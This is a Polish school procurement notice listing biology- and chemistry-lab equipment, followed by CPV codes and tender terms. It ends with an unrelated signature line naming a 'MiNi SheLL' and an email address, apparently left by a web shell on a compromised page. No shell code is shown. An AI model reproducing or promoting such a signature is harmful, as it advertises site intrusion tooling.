Wyposażenie pracowni biologicznej
Tablica interaktywna +projektor o krótkiej ogniskowej - 1 szt.
Komputer - 1 szt.
Projektor krótkoogniskowy D930TX- 1 szt.
Tablet graficzny - 1 szt.
Mikroskop szkolny - 15 szt.
Kamera do mikroskopów AV- 1 szt.
Preparaty mikroskopowe  - 1 szt.
Preparaty mikroskopowe  - 1 szt.
Preparaty mikroskopowe - 1 szt.
Preparaty mikroskopowe - - 1 szt.
Budowa oka człowieka - model gumowy - 1 szt.
DNA - model- 1 szt.
Tułów człowieka - 1 szt.
Fantom szkoleniowy - 1 szt.
Stół szkolny uczniowski 2-osobowy- 14 szt.
Krzesło szkolne uczniowskie- 28 szt.
Biurko nauczyciela 2-szafkowe- 1 szt.
Krzesło nauczyciela tapicerowane- 1 szt.
Meblościanka /1 kpl. - 4 segmenty/- 1 szt.
Tablica suchościeralna - 1 szt.
TRANSPORT + MONTAŻ- 1 szt.

Wyposażenie pracowni chemicznej
Stanowisko demonstracyjne nauczyciela - 1 szt.
Stolik laboratoryjny 3-osobowy - 6 szt.
Stolik laboratoryjny 2-osobowy- 4 szt.
Kanał laboratoryjny - 1 szt.
Dygestorium - - 1 szt.
Fotel obrotowy dla nauczyciela- 1 szt.
Krzesło szkolne uczniowskie- 26 szt.
Tablica interaktywna +projektor o krótkiej ogniskowej     - 1 szt.                            (montaż, okablowanie, przeszkolenie)
komputer - 1 szt.
Tablet graficzny - 1 szt.
Szafa na odczynniki z wyciągiem- 1 szt.
Zestaw do doświadczeń uczniowskich z chemii- 8 szt.
Zestaw do budowy modeli chemicznych - 8 szt.
Suszarka na naczynia laboratoryjne- 3 szt.
Waga laboratoryjna szalkowa- 8 szt.
Szczotki do mycia probówek- 20 szt.
Paski wskaźnikowe ph /uniwersalne/- 4 szt.
Przyrząd do elektrolizy- 1 szt.
Cylinder z podziałką - 15 szt.
Cylinder z podziałką - 15 szt.
Cylinder z podziałką- 15 szt.
Cylinder z podziałką- 5 szt.
Moździerz porcelanowy z tłuczkiem- 8 szt.
Parownia - 15 szt.
Pipeta - 15 szt.
Probówki fi 15-16 x 160 mm- 100 szt.
Zakraplacz z gumką- 20 szt.
Zlewka - 20 szt.
Zlewka - 20 szt.
Zlewka - 5 szt.
Zlewka- 5 szt.
Sączki /100 szt./- 2 szt.
Zestaw odczynników dla gimnazjum- 8 szt.
TRANSPORT + MONTAŻ- 1 szt.

39162110-9 Sprzęt dydaktyczny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 38.51.90.00-6, 38.65.21.00-1, 39.10.00.00-3, 39.11.00.00-6, 39.16.21.00-6, 39.16.21.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com